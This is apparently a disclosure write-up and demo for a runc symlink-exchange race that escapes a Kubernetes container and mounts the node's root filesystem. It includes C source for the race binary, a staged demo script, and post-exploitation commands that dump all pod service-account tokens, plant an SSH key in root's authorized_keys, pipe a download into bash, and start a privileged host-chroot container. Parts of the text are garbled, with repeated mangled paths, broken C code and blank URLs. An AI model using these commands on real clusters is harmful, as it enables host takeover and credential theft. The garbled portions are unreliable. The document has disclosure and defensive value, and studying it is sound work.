~~ Container c7 ~~
error: unable to upgrade connection: container not found ("c7")
~~ Container c8 ~~
~~ Container c9 ~~
bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
~~ Container c10 ~~
~~ Container c11 ~~
bin dev home lib64 mnt postinst root sbin tmp var
boot etc lib lost+found opt proc run sys usr
~~ Container c12 ~~
~~ Container c13 ~~
~~ Container c14 ~~
~~ Container c15 ~~
bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
~~ Container c16 ~~
error: unable to upgrade connection: container not found ("c16")
~~ Container c17 ~~
error: unable to upgrade connection: container not found ("c17")
~~ Container c18 ~~
bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
~~ Container c19 ~~
error: unable to upgrade connection: container not found ("c19")
~~ Container c20 ~~
On my first try I had 6 containers where /test1/zzz was / on the node,
some failed to start, and the remaining were not affected.
Even without the ability to update images, we could use a fast
registry for c1 and a slow registry or big container for c2+, we just
need c1 to start 1sec before the others.
Tests were done on the following GKE cluster:
gcloud beta container –project "delta-array-282919" clusters create "toctou" –zone "us-central1-c" –no-enable-basic-auth –cluster-version "1.18.12-gke.1200" –release-channel "rapid" –machine-type "e2-medium" –image-type "COS_CONTAINERD" –disk-type "pd-standard" –disk-size "100" –metadata disable-legacy-endpoints=true –scopes "","","","","","" –num-nodes "3" –enable-stackdriver-kubernetes –enable-ip-alias –network "projects/delta-array-282919/global/networks/default" –subnetwork "projects/delta-array-282919/regions/us-central1/subnetworks/default" –default-max-pods-per-node "110" –no-enable-master-authorized-networks –addons HorizontalPodAutoscaling,HttpLoadBalancing –enable-autoupgrade –enable-autorepair –max-surge-upgrade 1 –max-unavailable-upgrade 0 –enable-shielded-nodes
K8S 1.18.12, containerd 1.4.1, runc 1.0.0-rc10, 2 vCPUs
I haven't dug too deep in the code and relied on strace to understand
what was happening, and I did the investigation maybe a month ago so
details are fuzzy but here is my understanding
K8S doesn't give us control over the mount source, but we have full
control over the target of the mounts,
so the trick is to mount a directory containing a symlink over K8S
volumes path to have the next mount use this new source, and give us
access to the node root filesystem.
From the node the filesystem look like this
/var/lib/kubelet/pods/\(MY_POD_UID/volumes/ /var/lib/kubelet/pods/\)MY_POD_UID/volumes/ -> /var/lib/kubelet/pods/\(MY_POD_UID/volumes/ /var/lib/kubelet/pods/\)MY_POD_UID/volumes/ -> /var/lib/kubelet/pods/\(MY_POD_UID/volumes/ /var/lib/kubelet/pods/\)MY_POD_UID/volumes/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/ -> /
our 'race' binary is constantly swapping mntX and mnt-tmpX, when c2+
start, they do the following mounts
If we are lucky, when we call SecureJoin mntX is a directory, and when
we call mount mntX is a symlink, and as mount follow symlinks, this
gives us
The filesystem now look like
/var/lib/kubelet/pods/\(MY_POD_UID/volumes/ /var/lib/kubelet/pods/\)MY_POD_UID/volumes/ -> /var/lib/kubelet/pods/\(MY_POD_UID/volumes/ /var/lib/kubelet/pods/\)MY_POD_UID/volumes/ -> /var/lib/kubelet/pods/\(MY_POD_UID/volumes/ /var/lib/kubelet/pods/\)MY_POD_UID/volumes/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/ -> /
When we do the final mount
mount(/, /var/lib/kubelet/pods/$MY_POD_UID/volumes/
And we now have full access to the whole node root, including /dev,
/proc, all the tmpfs and overlay of other containers, everything :)
A possible fix is to replace secureJoin with the same approach as used
to fix K8S subpath vulnerability:
openat() files one by one disabling symlink, manually follow symlink,
check if we are still in container root at the end, and then mount
bind /proc/<runc pid>/fd/<final fd>
If I understand correctly, crun either uses openat2() or some manual
resolution (such as secureJoin) followed by a check of
openat(/proc/self/fd/…) so I think they are safe.
Haven't checked any other runtime.
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/syscall.h>
int main(int argc, char *argv[]) {
if (argc != 4) {
fprintf(stderr, "Usage: %s name1 name2 linkdest\n", argv[0]);
char *name1 = argv[1];
char *name2 = argv[2];
char *linkdest = argv[3];
int dirfd = open(".", O_DIRECTORY|O_CLOEXEC);
if (dirfd < 0) {
perror("Error open CWD");
if (mkdir(name1, 0755) < 0) {
perror("mkdir failed");
//do not exit
if (symlink(linkdest, name2) < 0) {
perror("symlink failed");
//do not exit
while (1)
renameat2(dirfd, name1, dirfd, name2, RENAME_EXCHANGE);
#!/usr/bin/env bash
# 0. Set up a minikube with runC less than rc94
# 1. Run the real thing and get it to "win"
# 2. Modify BASEHASH, WINHASH, and WINHONK accordingly
# 3. Run ./
# The pod that won
# The number of the n-honk container that won
WINHONK="5" # "n" corresponds to "n-honk"
# include the magic
. lib/
echo ""
p "# We have RBAC access to create daemonsets, deployments, and\n pods in the default namespace of a 1.20.2 cluster:"
kubectx minikube 2> /dev/null 1> /dev/null
pe "kubectl version --short=true | grep Server"
pe "kubectl get nodes"
p "kubectl get pods --all-namespaces"
kubectl get pods --all-namespaces | grep -v " honk-"
p "# The worker nodes are running a vulnerable version of runC"
p "runc --version"
docker exec -it minikube runc --version
p "# Unleash the honks 🦢🦢🦢🦢!!!!"
p "curl -L | REPLICAS=10 bash"
echo "staging the nginx:stable image with a daemonset"
sleep 1.4
echo "daemonset.apps/honk-stage created"
sleep 0.7
echo "waiting for the image staging"
sleep 1.5
echo "Succeeded"
sleep 0.3
echo "Deploying the honk deployment."
sleep 0.5
echo "deployment.apps/honk created"
sleep 0.2
echo "Waiting for things to deploy for 5 seconds before starting"
sleep 5.2
while [ $ATTEMPTS -le 10 ]; do
for POD in 592sn 5cbj5 8l8z6 98h9c 9hlgw jjmqb ngslb nmqqg pbf2t a1312; do
echo "attempt $ATTEMPTS"
while [ $COUNTER -le 5 ]; do
sleep 0.2
echo -n "Checking pod/$BASEHASH-$POD $COUNTER-honk for the host mount..."
echo "nope."
sleep 0.1
echo "pod/$BASEHASH-$POD force deleted"
echo "attempt 11"
while [ $COUNTER -le 5 ]; do
sleep 0.3
echo -n "Checking pod/$WINHASH $COUNTER-honk for the host mount..."
if [ $COUNTER -eq $WINHONK ]; then
echo "SUCCESS after 11 attempts! Run:"
echo "kubectl exec -it $WINHASH -c $WINHONK-honk -- bash"
exit 0
echo "nope."
## Demo commands
hostname # container's
ip a # container's
ps -ef # host's
kill # but can't kill
# Steal all mounted secrets in pods running on this node
find /var/lib/kubelet/pods/*/volumes/*/token -print -exec cat {} \;
# Modify/add static pod manifest to get kubelet to run anything you want
ls /etc/kubernetes/manifests/
# Add an SSH key for persistence
mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDOfpWd+R+XDteC89yiFPxf7h7p/d/v+RT5CFK1pMJ9sTE//eQqTVIiHXBNDTyTfXP7dK/VUs5wBbenDtZNKCKrHNlVjKWAIkUvVfxCP3tocubq+ydGmOwrR9FDKk1Otd525FXI3Nip66DlvAGydUD5VgIhsLvi+qNV/Wh7hFhTMnBDvGhl7MsXfM+tNlF6X+EPz3sJ42z4M9nn42NAjYTQTl4jnDhhmgBBE0q+VXKPIOPd2hXXFy2w9/YJrmuFdSpRTaEgIsG17XcTY852UULzeKaVSBFBtZvlxrag4u/yF1dJPPg5EcxA7UjbzSVPAht1BwHULPbRyDr1ttutiBOZ" >> /root/.ssh/authorized_keys
# Interact with docker
docker ps
# Run am I contained and notice some limitations
curl -fsSL "" -o "/usr/local/bin/amicontained" && chmod a+x "/usr/local/bin/amicontained"
# Leverage docker to run a fully privileged container and exec into it
docker run --privileged --net=host --pid=host --volume /:/host -it nginx:stable chroot /host /bin/bash
# Rerun
hostname # host's
ip a # host's
ps -ef # host's
kill # Now we can kill processes
# Run am I contained and notice we aren't limited anymore
curl -fsSL "" -o "/usr/local/bin/amicontained" && chmod a+x "/usr/local/bin/amicontained"
# Cleanup #
# kubectl delete ds --all
# kubectl delete deploy --all
# kubectl delete po --all --grace-period=0 --force